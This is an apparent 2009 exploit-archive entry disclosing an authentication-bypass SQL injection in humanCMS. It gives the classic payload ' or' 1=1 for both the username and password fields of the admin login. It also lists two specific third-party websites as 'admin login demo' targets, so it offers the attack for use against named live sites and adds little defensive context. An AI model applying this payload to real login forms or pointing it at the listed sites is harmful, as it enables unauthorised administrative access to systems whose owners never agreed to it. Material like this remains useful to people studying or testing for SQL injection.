[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : humanCMS (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-08-24
# Author : next
# Previous Title : Uebimiau Webmail 3.2.0-2.0 Arbitrary Database Disclosure Vuln
# Next Title : ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit


()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
()                                                                                                    ()
()    f KHatr Zfaft Zenta9 f Zfaft Galo ya khir CHirbakhzer                                           ()                                                                                           
()                                                                                                    ()
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
[+]  humanCMS   (Auth Bypass)  SQL Injection Vulnerability
[+]  Discovered by  next
[+]  www.sa3eka.com   ()()()()()  www.m4r0c-s3curity.cc
[+] vie.0[at]hotmail.com
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

[+]  Home Page      :      http://www.squarelabel.com
                           "humanCMS site description"

[+]  Auth Bypass

[+] expolit    :           username :     ' or' 1=1
                           password :      ' or' 1=1

[+] admin login demo :
                           http://www.festivalcite.ch/index.php?id=&action=login
                           http://www.squarelabel.com/index.php?id=&action=login

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

# www.Syue.com [2009-08-24]